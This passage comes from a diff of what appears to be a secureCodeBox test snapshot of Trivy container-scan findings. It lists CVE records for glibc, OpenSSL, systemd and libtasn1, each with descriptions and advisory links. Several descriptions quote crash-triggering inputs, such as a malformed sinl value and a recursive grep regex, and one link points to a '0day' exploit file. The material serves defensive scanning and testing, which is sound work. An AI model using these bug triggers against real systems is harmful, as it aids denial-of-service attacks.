"https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", + "references": [ + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", + ], + }, + "category": "Vulnerability", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "openssl: RSA authentication weakness", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], "severity": "MEDIUM", @@ -134113,62 +135252,52 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", - }, - { - "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -134176,6241 +135305,6238 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + 